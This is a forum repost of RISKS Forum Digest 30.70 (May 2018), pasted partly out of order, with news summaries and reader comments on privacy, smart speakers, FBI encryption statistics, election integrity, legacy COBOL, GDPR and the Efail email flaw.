    http://arstechnica.com/gadgets/2018...o-device-secretly-shared-users-private-audio/

    Amazon confirmed an Echo owner's privacy-sensitive allegation on Thursday,
    after Seattle CBS affiliate KIRO-7 reported that an Echo device in Oregon
    sent private audio to someone on a user's contact list without permission.
    ...."Unplug your Alexa devices right now," the user, Danielle (no last name
    given), was told by her husband's colleague in Seattle after he received
    full audio recordings between her and her husband, according to the KIRO-7
    report. The disturbed owner, who is shown in the report juggling four
    unplugged Echo Dot devices, said that the colleague then sent the offending
    audio to Danielle and her husband to confirm the paranoid-sounding
    allegation. (Before sending the audio, the colleague confirmed that the
    couple had been talking about hardwood floors.)

    After calling Amazon customer service, Danielle said she received the
    following explanation and response: "'Our engineers went through all of your
    logs. They saw exactly what you told us, exactly what you said happened, and
    we're sorry.' He apologized like 15 times in a matter of 30 minutes. 'This
    is something we need to fix.'" ... Ya think?

    ------------------------------

    Date: Tue, 22 May 2018 18:15:53 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: FBI dramatically overstates how many phones they can't get into (WaPo)

    http://www.washingtonpost.com/world...68ae90-5dce-11e8-a4a4-c070ef53f315_story.html

    The FBI has repeatedly provided grossly inflated statistics to Congress and
    the public about the extent of problems posed by encrypted cellphones,
    claiming investigators were locked out of nearly 7,800 devices connected to
    crimes last year when the correct number was much smaller, probably between
    1,000 and 2,000, The Washington Post has learned. [They've actually been
    triple-counting! PGN]

    Over a period of seven months, FBI Director Christopher A. Wray cited the
    inflated figure as the most compelling evidence for the need to address what
    the FBI calls Going Dark -- the spread of encrypted software that can block
    investigators' access to digital data even with a court order.

    The FBI first became aware of the miscount about a month ago and still does
    not have an accurate count of how many encrypted phones they received as
    part of criminal investigations last year, officials said. Last week, one
    internal estimate put the correct number of locked phones at 1,200, though
    officials expect that number to change as they launch a new audit, which
    could take weeks to complete, according to people familiar with the work. [...]

    [See EFF's take on this:
    http://www.eff.org/deeplinks/2018/05/fbi-admits-it-inflated-number-supposedly-unhackable-devices
    PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google to remove "secure" indicator from HTTPS pages on Chrome"
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: Thu, 17 May 2018 15:55:43 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Google's Selfish Ledger is an unsettling vision of Silicon Valley
    social engineering (The Verge)

    Google has built a multibillion-dollar business out of knowing everything
    about its users. Now, a video produced within Google and obtained by The
    Verge offers a stunningly ambitious and unsettling look at how some at the
    company envision using that information in the future.

    The video was made in late 2016 by Nick Foster, the head of design at X
    (formerly Google X), and a co-founder of the Near Future Laboratory. The
    video, shared internally within Google, imagines a future of total data
    collection, where Google helps nudge users into alignment with their goals,
    custom-prints personalized devices to collect more data, and even guides the
    behavior of entire populations to solve global problems like poverty and
    disease.

    When reached for comment on the video, an X spokesperson provided the
    following statement to The Verge:

    “We understand if this is disturbing -- it is designed to be. This is a
    thought-experiment by the Design team from years ago that uses a technique
    known as ‘speculative design’ to explore uncomfortable ideas and concepts
    in order to provoke discussion and debate. It's not related to any current
    or future products.”

    http://www.theverge.com/2018/5/17/17344250/google-x-selfish-ledger-video-data-privacy

    ------------------------------

    Date: Fri, 18 May 2018 09:31:10 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A flaw in a connected alarm system exposed vehicles to remote
    hacking" (ZDNet)

    Zack Whittaker for Zero Day | 17 May 2018
    http://www.zdnet.com/article/flaw-connected-alarm-system-exposed-vehicles-remote-hacking/

    The researchers said it was easy to locate a nearby car, unlock it, and
    drive away.

    opening text:

    A bug that allowed two researchers to gain access to the backend systems of
    a popular Internet-connected vehicle management system could have given a
    malicious hacker everything they needed to track the vehicle's location,
    steal user information, and even cut out the engine.

    In a disclosure this week, the researchers Vangelis Stykas and George
    Lavdanis detailed a bug in a misconfigured server run by Calamp, a
    telematics company that provides vehicle security and tracking, which gave
    them "direct access to most of its production databases."

    ------------------------------

    Date: Thu, 17 May 2018 20:55:36 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Syrian hackers who tricked reporters indicted (WashPo)

    The pair used phishing schemes to compromise news organizations.

    http://www.washingtonpost.com/local...9ef328-59e7-11e8-858f-12becb4d6067_story.html

    ------------------------------

    Date: Fri, 18 May 2018 08:57:22 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco critical flaw warning: These 10/10 severity bugs need
    patching now" (ZDNet)

    Liam Tung, ZDNet, 17 May 2018

    http://www.zdnet.com/article/cisco-critical-flaw-warning-these-1010-severity-bugs-need-patching-now/

    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    Cisco's software for managing software-defined networks has three critical,
    remotely exploitable vulnerabilities.

    ------------------------------

    Date: Thu, 17 May 2018 21:01:00 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    From a digitized JFK speech that he never gave to colorized Lincoln and
    Holocaust photos, scholars are debating a wave of historical re-creation
    and manipulation.

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    ------------------------------

    Date: Tue, 22 May 2018 09:26:21 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)

    http://www.bostonglobe.com/metro/20...could-wrong/D7fX11PReUWzVsAAdqC1qN/story.html

    ------------------------------

    Date: Tue, 22 May 2018 09:18:13 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)

    http://www.bostonglobe.com/news/nat...a-cum-laude/npFzLAzg2b7w54247o3MIO/story.html

    [I won't insult long-time RISKS readers with pointers to the predecessors
    of this item. There are too many. PGN]

    ------------------------------

    Date: Wed, 16 May 2018 07:47:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: The surprising return of the repo man (WashPo)

    New technology and bad auto loans mean more cars are being taken back.

    http://www.washingtonpost.com/busin...fcd30e-4d5a-11e8-af46-b1d6dc0d9bfe_story.html

    ------------------------------

    Date: Tue, 22 May 2018 15:59:15 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)

    Report: President Trump clings to his Twitter phone, reluctant to allow
    security checks.

    http://arstechnica.com/information-...tial-smartphone-security-is-too-inconvenient/

    Security ... inconvenient. Who knew?

    ------------------------------

    Date: Sat, 19 May 2018 10:22:51 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to
    Win Election (NY Times)

    NNSquad
    http://www.nytimes.com/2018/05/19/u...r-prince-zamel.html?smid=tw-nytimes&smtyp=cur

    Three months before the 2016 election, a small group gathered at Trump
    Tower to meet with Donald Trump Jr., the president's eldest son. One was
    an Israeli specialist in social media manipulation. Another was an
    emissary for two wealthy Arab princes. The third was a Republican donor
    with a controversial past in the Middle East as a private security
    contractor.

    ------------------------------

    Date: Thu, 17 May 2018 10:00:20 -0700
    From: "Mark E. Smith" <mym...@gmail.com>
    Subject: Re: Securing Elections (RISKS-30.69)

    PGN cites Bruce Schneier:

    "Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them."

    Elections serve a third purpose, one which I think is much more important
    than accurately choosing a winner and convincing the loser: US elections are
    intended to make people think that they have a say in government when they
    don't.

    Some of the framers of the Constitution were concerned about the possibility
    of the "mob and rabble" eventually getting the vote and using it to obtain a
    voice in government. So they made no Constitutional provision that the
    popular vote had to be counted (Bush v. Gore 2000). They also took other
    precautions. They made Congress the sole judge of the "Elections, Returns,
    and Qualifications" of its Members, and the only venue where the loser of a
    rigged election could appeal. But by the time they file that appeal, the
    "winner" has usually already been sworn into office, and Congress doesn't
    like to remove sitting members, so if anyone is aware of an appeal that has
    been successful, I'd like very much to know about it.

    We are so accustomed to a losing candidate taking office, that it isn't even
    noteworthy these days. The Supreme Court can intervene to seat the loser, or
    the winner can concede and throw the election to the loser. In a democratic
    system, such events would result in a new election, not in handing over
    office to somebody who wasn't elected.

    These realizations and others led me to informally poll the groups of
    election integrity activists I was part of at that time, with shocking
    results. I asked if they would still vote if the only permissible voting
    machine was a flush toilet. Approximately 50% stated that they would
    continue to vote, even if they knew for a fact that their vote would not be
    counted and would be flushed away as soon as they cast their ballot. Some
    angrily accused me to trying to take away their precious right to vote, for
    which their ancestors had fought and died.

    So I repeated the poll online and got the same result. About 50% of voters
    appear to be concerned with casting their votes, not about whether their
    votes are actually counted, no less counted accurately. They associate
    democracy with elections, so they believe that if they vote, whether or not
    their votes are counted accurately (or at all), they are participating in
    democracy.

    If votes are not counted, or are not counted accurately, voters are not
    electing anyone. But for a political system to be called democratic, voters
    would have to have a way to hold their elected officials accountable. Our
    system does this by allowing voters to cast more uncounted, miscounted, or
    overruled ballots once the incumbent's term of office is over. So if someone
    is elected, whether legitimately or fraudulently, and then decides to
    destroy the country (perhaps by nuking a few cities to end the homelessness
    and poverty problems, or some other ill-conceived ventures), the voters can
    do nothing but wait until their term in office is over, if anyone has
    survived, to try to hold them "accountable" by "electing" another
    unaccountable official. There is no right of recall at the federal level,
    therefore no means of holding "elected" officials accountable in a timely
    way.

    With mail-in ballots, which seem to predominate these days, there is no
    chain-of-custody possible. The offices of election officials are closed to
    the public between the election and the certification, and official
    observers aren't always notified when votes are counted, so corrupt
    elections officials have plenty of time to manufacture phantom votes, stuff
    the electronic "ballot boxes," and manipulate the actual results to match
    the results they want. As for audits, you can't ask for an audit until after
    the election has been certified (election officials certify only that an
    election was held in accordance with law, not that it was accurate), by
    which time the fraudulent "winner" has usually already been sworn into
    office and cannot be removed except by Congress. Many Members of Congress,
    like Nancy Pelosi, believe that it is more important that constituents be
    represented, than that they be represented by the person they voted
    for. Members of Congress are very well aware that voters have no way to hold
    them accountable, so they see no difference between people being
    "represented" by candidates who will and candidates who won't actually
    represent their interests. Once you vote (and hopefully donate to the
    campaign war chests of a few billionaires), your job is done and the
    elections have been a success. People who vote believe, at a minimum, that
    there might be a slight chance that their vote could be counted and that
    someone willing to represent them might be elected, so the primary purpose
    of elections, to make people think that they have a voice in government when
    they don't, has been achieved.

    Even if we could somehow manage to get them, transparent, auditable
    elections wouldn't eliminate risks to democracy. Our system, under a
    Constitution where the votes don't have to be counted, the Supreme Court can
    intervene to change the outcome, and those elected can't be held
    accountable, isn't electoral democracy, it is electoral tyranny, and your
    vote is your consent.

    ------------------------------

    Date: Sat, 19 May 2018 11:56:43 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Dark code (DW, RISKS-30.69)

    I never had any problem getting COBOL to interact with other languages, from
    PL/I to FORTRAN, C, and assembler. If you Read the Fine Manual and followed
    the guidance it worked even before IBM Language Environment united them into
    a single run time environment. Legacy COBOL didn't have function calls, but
    those could be replaced by a parameterized subroutine call with the output
    variables as named arguments in the call parameter list.

    At the 2014 IEEE International Conference on Software Maintenance and
    Evolution I was struck by the absence of any interest or work in applying
    the very effective techniques developed for refactoring C and Java code to
    COBOL. I would have thought that there is a huge market for something that
    can process legacy COBOL code and refactor it into COBOL or newer languages,
    recovering and improving the design along the way.

    COBOL is a relatively orthogonal language. There is usually only one
    obvious or builtin way to do something, In PL/I there are usually 10
    different ways, few of which give optimal performance. Once you have
    considered
    ADD GIN TO VERMOUTH GIVING MARTINI;
    there aren't a lot of other options beyond
    COMPUTE MARTINI = VERMOUTH + GIN;

    http://ieeexplore.ieee.org/xpl/mostRecentIssue.jsp?punumber=6969845

    Working with Honeywell COBOL was something of a challenge, because byte size
    varied from 4 to 9 bits, depending on the Data Type. That could give some
    surprising 4 bit to 8 or 9 bit text conversion results when Group moves were
    interpreted as text based moves of a number of bytes. Packed Decimal data
    fields were considered to be 4 bit text, with every 9th bit a slack bit to
    restore alignment on a 9 or 36 bit boundary on those 36 bit word
    machines. Going through an IBM structured EBCDIC, binary and decimal tape
    master file deciding how to convert series of bytes to an appropriate HIS
    COBOL ASCII, binary or decimal format, depending on the context and data
    segment prefix was challenging, but doable. Ditto for the reverse process
    creating a tape to send back to the IBM computer in the same data centre.

    ------------------------------

    Date: Mon, 21 May 2018 22:44:51 +1200
    From: "Richard O'Keefe" <rao...@gmail.com>
    Subject: Re: Dark Code (DW, RISKS-30.69)

    The article noted by Wendy Grossman says things like "COBOL has to evolve"
    and implies that interoperation with new systems is especially different.

    COBOL *has* evolved. The current standard is from 2014. If you want to
    interoperate with Java, there are COBOL compilers that do that (like Elastic
    COBOL). If you want to interoperate with .Net, there's NetCOBOL to do that.
    And since standard COBOL has been an OO language since 2002, those are
    better fits than you might think. Modern compilers are catching up with the
    standards, but it always takes time. What if you want to interoperate using
    XML or JSON? IBM's COBOL for z/OS, release 6.2 supports XML and has JSON
    PARSE and JSON GENERATE statements.

    Of course modern COBOL is still COBOL underneath and while I'm OK reading
    it, I would have to be paid large sums of money to write it. Though the
    various Eclipse plugins that exist for COBOL should make that a lot easier
    than it used to be.

    So if COBOL *has* evolved and *does* interoperate and *does* have modern
    development tools, what's the problem?

    Well, COBOL has evolved, for one thing. I rather liked the compatibility
    remark in the Brand X documentation: a certain aspect used to be
    incompatible with the standard, but the standard has changed, and now we are
    compatible. And COBOL interoperates: if you have a COBOL program that used
    DMS II or IMS adapting it to a different data base system won't be easy.
    There's one large COBOL system I'm aware of where out of (operating system,
    data base system, programming language) COBOL is the *best* known part
    today.

    As for training, COBOL is verbose in the extreme and the standards and
    reference materials combine long-windedness with less precision than I'm
    comfortable with, BUT it's really not that hard to learn. And if people
    succeeded in writing useful programs that are still running decades later,
    that says *something* positive about the language.

    I suspect the problems are mostly mundane ones of poor documentation,
    inadequate test sets, institutional knowledge lost when people resigned,
    retired, or died, all of which have nothing to do with the language.

    ------------------------------

    Date: Fri, 18 May 2018 16:45:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Fitness App Leads To Arrest For Attack On McLean Cyclist
    (McLean, VA Patch)

    http://patch.com/virginia/mclean/fitness-app-leads-arrest-attack-mclean-cyclist

    Not quite a risk to the user -- more a public service finding him as violent
    assailant. But more details would have been nice, e.g., how police
    identified tracker used, then person wearing it.

    ------------------------------

    Date: Sat, 19 May 2018 17:54:44 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Man Is Charged With Hacking West Point and Government Websites (NYT)

    http://www.nytimes.com/2018/05/10/nyregion/hacker-west-point-nyc-comptroller.html

    The man, who is thought to have hacked thousands of sites around the world,
    was arrested in California and could face up to 21 years in prison.

    "But some social media watchers said they were still surprised at the speed
    with which the Santa Fe shooting descended into information warfare.
    Sampson said he watched the clock after the suspect was first named by
    police to see how long it would take for a fake Facebook account to be
    created in the suspect's name: less than 20 minutes."

    If, as a hypothetical, Facebook required formal authentication of identity
    for account creation, such as confirmation of applicant's existence via a
    national birth registry, bona fide biometric comparison, and revenue/tax
    authority check, fake users would approach zero. This assumes these
    credentials are not stolen, or these government entities are not
    man-in-the-middle attack subjects.

    Internet anonymity would become harder to achieve along with criticism and
    free discussion of important global, national, and local issues that
    anonymity often promotes.

    Authentication, in a democracy, appears strongest for convicted criminals
    and individuals possessing security clearances. Expense and the law
    forestall establishment of mandatory, nation-wide authentication
    identification franchise.

    Will future political expedience compel adoption? An informed electorate
    should possess the wisdom and exclusive right to decide on this ominous
    subject.

    ------------------------------

    Date: Sat, 19 May 2018 15:24:51 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Fake Facebook accounts and online lies multiply in hours after
    Santa Fe school shooting (WashPo)

    It has become a familiar pattern in the all-too-common aftermath of American
    school shootings: A barrage of online misinformation, seemingly designed to
    cloud the truth or win political points. But some were still surprised at
    the speed with which the Santa Fe shooting descended into information
    warfare.

    http://www.washingtonpost.com/news/...iply-in-hours-after-santa-fe-school-shooting/

    [See also: Russian Trolls Instantly Spread Fake News Online About Alleged
    Santa Fe School Shooter (Dimitrios Pagourtzis),
    http://www.inquisitr.com/4905300/di...sian-trolls-facebook-santa-fe-school-shooter/
    PGN]

    ------------------------------

    Date: Thu, 17 May 2018 11:29:20 +0100
    From: "Wol's lists" <antl...@youngman.org.uk>
    Subject: Re: "Warning: Dangerous Fake Emails About Google Privacy Changes"
    (RISKS-30.69)

    I am to some extent involved (in that I have some minimal legal liability)
    in the implementation of the GDPR, and all I can say is that whole-heartedly
    approve. In Europe we seem to have this belief - apparently unheard of to
    Americans - that openness and fair dealing is much better all round.

    The GDPR enshrines good practice in law. It merely forces organisations to
    do what they should have been doing anyway. It also outlaws a bunch of sharp
    practices - which is why it's causing so much grief because those sharp
    practices were also common practice.

    The law divides into two groups, data USERS and data SUBJECTS. It places an
    obligation on data users to obtain *informed* consent. It also places an
    obligation to have a *record* of such consent. Which is why you're getting
    all these emails and letters to opt back in.

    Because so many permissions were granted by data SUBJECTS who didn't realise
    that the data USER had kindly pre-ticked a bunch of permission boxes giving
    the data user permission to do pretty much anything they wanted to. This
    sharp practice is now illegal.

    It also reinforces the right of the data SUBJECT to have any data the data
    user holds about them to be corrected or deleted (subject to other legal
    constraints, of course).

    In summary, if you are a decent organisation (the law doesn't apply to
    individuals), doing things properly, and keeping a decent paper trail, this
    legislation is pretty much a non-event.

    Of course, this summary does not account for incompetent implementation of
    the directive by politicians (par for the course, sadly), or incompetent
    CxO's who don't understand the legislation (sadly also par for the
    course). And sadly also apparently true for the person in charge of the
    directive at my organisation :-(

    ------------------------------

    Date: Wed, 23 May 2018 12:47:09 -0700
    From: Yooly <nah...@yahoo.co.jp>
    Subject: Re: Not So Pretty: What You Need to Know About E-Fail and the PGP
    Flaw (EFF, RISKS-30.69)

    This is not a PGP flaw but a problem arising from using HTML in email, the
    consequence of a stupid choice made years ago. I had assumed nobody would
    bat an eye upon seeing the term "HTML" being mentioned in the same breath as
    "mail client", but fortunately I was proven wrong: Atlantic Magazine's May
    21, 2018, issue carries an article with the title "Email Is Dangerous", from
    which I quote the following:

    "Matt Blaze, an associate professor of computer and information science at
    the University of Pennsylvania, took to Twitter after the Efail announcement
    to say, 'I've long thought HTML email is the work of the devil, and now we
    have proof I was right. But did you people listen? You never listen.'"

    http://www.theatlantic.com/technology/archive/2018/05/email-is-dangerous/560780/

    Alternative URL, if the original URL for the article ends up broken in the message you read:
    http://shorturl.at/gltZ6

    Years ago, after someone had started using HTML with email, I tried to
    convince people to refrain from using software that inserted HTML into their
    messages, but this turned out to be a lost cause, so I have instead been
    focusing on protecting myself: my mail software reliably strips all
    JavaScript and HTML from messages before they end up in my Inbox - and I am
    still alive and manage to communicate via email for work and pleasure (who'd
    a'thunk?).

    ------------------------------

    Date: Thu, 17 May 2018 11:09:41 -0400
    Subject: Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll
    (NYT)

    I have such a car myself (not a Toyota, but another brand with "keyless"
    operation). It does have an audible and visual warning when I exit the
    running car and take the key with me. But, I've exited the car, so what good
    is the warning? I don't actually see and hear it until I get back into the
    car. What I do hear is the engine running, both before I exit and after I
    start walking. Was this model perhaps a hybrid that was in silent electric
    mode at the time? And if so, wouldn't a better check be to not re-start the
    engine without the keyfob sensed?

    ------------------------------

    Date: Fri, 18 May 2018 13:33:13 -0500
    From: Dimitri Maziuk <dma...@bmrb.wisc.edu>
    Subject: Re: Chinese GPS (RISKS-30.69)

    Nothing new there.

    Back in the USSR it was the subject of many jokes, e.g. a foreign spy asking
    a local about some landmark marked on his map that isn't there. The local
    answers "these maps are garbage, see that top-secret `nucular' missile plant
    over there? -- it's right next to that".

    ------------------------------

    Date: Sat, 19 May 2018 10:50:06 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: The risk from robot weapons (RISKS-30.69)

    During WWII, the Russians trained dogs to hide under tanks when they heard
    gunshots. Then they tied bombs to their backs and sent them to blow up
    German tanks. Or so was the plan.

    What the Russians did not take into account, was that the dogs were trained
    with Russian tanks, which used diesel, but the German tanks used gasoline,
    and smelled different. So when hearing gunshots, the dogs immediately ran
    under the nearest *Russian* tank.

    This tale is about natural intelligence, which we're suppose to understand.
    The problem with AI, especially *learning machines*, is that we can try to
    control what they do, but cannot control how they do it.

    So we never know, even when we get correct answers, whether the machine had
    found some logic path to the answer, or maybe the answer just *smells
    right*. In the latter case, we might be surprised when asking questions we
    do not know the right answer to.

    ------------------------------

    Date: Sun, 20 May 2018 09:42:48 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Will You Be My Emergency Contact Takes On a Whole New Meaning
    (The New York Times)

    http://www.nytimes.com/2018/05/17/h...html?rref=collection/sectioncollection/health

    "Will you be my emergency contact?

    "When you’re dating, the question is a sign that you’ve made it to the
    this-is-really-serious category. When you’re friends, it’s a sign that
    you’re truly beloved or truly responsible. And if you’re related, it may
    mean that you will now be entered into a medical study together so
    scientists can figure out if sinus infections or anxiety run in your
    family.

    "What? That's right. Researchers have begun experimenting with using
    emergency contacts gathered from medical records to build family trees
    that can be used to study the heritability of hundreds of different
    attributes, and possibly advance research into diseases and responses to
    medications."

    HIPPA-restricted information becomes patient-surrendered anonymized
    information for research purposes with a right-to-use disclosure form.
    Networks of contacts await discovery for correlation with other reference
    sources. Medical insurance industry should take note enhance patient
    database surveillance activities.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:02 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)

    John Zhang produced a three-parent baby, implanted abnormal embryos and
    wants to help 60-year-old women have children.

    http://www.washingtonpost.com/natio...9105dc-1831-11e8-8b08-027a6ccb38eb_story.html

    ------------------------------

    Date: Sat, 19 May 2018 17:55:46 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    (NYTimes)

    http://www.nytimes.com/2018/05/14/science/biohackers-gene-editing-virus.html

    After researchers created a virus from mail-order DNA, geneticists sound the alarm about the genetic tinkering carried out in garages and living rooms.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.70
    ************************
  4. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    Joined:
    Apr 3, 2007
    Messages:
    4,340
    Likes Received:
    300
    Trophy Points:
    258
    Location:
    Tampa
    Ratings Received:
    +2,180
    Risks Digest 30.70

    RISKS List Owner

    May 26, 2018 7:09 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 26 May 2018 Volume 30 : Issue 70

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)
    Don't Put That in My Heart Until You're Sure It Really Works (NYT)
    "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)
    "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)
    Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)
    "This cryptocurrency phishing attack uses new trick to drain wallets"
    (Danny Palmer)
    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)
    ICE abandons its dream of ‘extreme vetting’ software that could
    E-Mail Clients are Insecure, PGP and S/MIME 100% secure
    E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)
    "Senator wants to know how police can locate any phone in seconds without
    a warrant" (Zach Whittaker)
    US cell carriers are selling access to your real-time phone location data
    (Zach Whittaker)
    Hundreds of Apps Can Empower Stalkers to Track Their Victims (NYTimes)
    "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into
    secret eavesdroppers" (CSO Online)
    So, Umm, Google Duplex's Chatter Is Not Quite Human (Scientific American)
    Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence (The Wrap)
    Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)
    Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)
    Most GDPR emails unnecessary and some illegal, say experts (The Guardian)
    The Pentagon Has a Big Plan to Solve Identity Verification in Two Years
    (Defense One)
    Unplug Your Echo! (Ars Technica)
    FBI dramatically overstates how many phones they can't get into (WaPo)
    "Google to remove "secure" indicator from HTTPS pages on Chrome" (ZDNet)
    Google's Selfish Ledger is an unsettling vision of Silicon Valley social
    engineering (The Verge)
    "A flaw in a connected alarm system exposed vehicles to remote hacking"
    (ZDNet)
    Syrian hackers who tricked reporters indicted (WashPo)
    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    (ZDNet)
    Is technology bringing history to life or distorting it? (WashPo)
    Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)
    Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)
    The surprising return of the repo man (WashPo)
    Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)
    Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to Win
    Election (NY Times)
    Re: Securing Elections (Mark E. Smith)
    Re: Dark code (Kelly Bert Manning, Richard O'Keefe)
    Fitness App Leads To Arrest For Attack On McLean Cyclist (McLean VA Patch)
    Man Is Charged With Hacking West Point and Government Websites (NYT)
    Fake Facebook accounts and online lies multiply in hours after Santa Fe
    school shooting (WashPo)
    Re: "Warning: Dangerous Fake Emails About Google Privacy Changes" (Wol)
    Re: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (Yooly)
    Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    Re: Chinese GPS (Dimitri Maziuk)
    Re: The risk from robot weapons (Amos Shapir)
    Will You Be My Emergency Contact Takes On a Whole New Meaning (NYT)
    This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)
    As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 22 May 2018 09:31:51 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)

    Boy, 9, dies in accident involving motorized room partition at his Fairfax school

    ------------------------------

    Date: Mon, 21 May 2018 19:30:25 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Don't Put That in My Heart Until You're Sure It Really Works
    (NYTimes)

    Opinion | Don’t Put That in My Heart Until You’re Sure It Really Works

    'The bar for approval of medical devices is too low. There is no reason we
    shouldn’t require, as we almost always do for drugs, a randomized
    placebo-controlled trial showing improvements in “hard” outcomes like
    mortality before approving them.

    'Unfortunately, the United States may soon make it even easier for medical
    devices to reach the patient’s bedside. The Food and Drug Administration is
    considering requiring less upfront research and instead adding increased
    oversight after a device has been introduced into the market. The argument
    is that this will spur technological innovation and perhaps help terminally
    ill patients. However, loosening regulations could extract a steep cost from
    patients and the health system.'

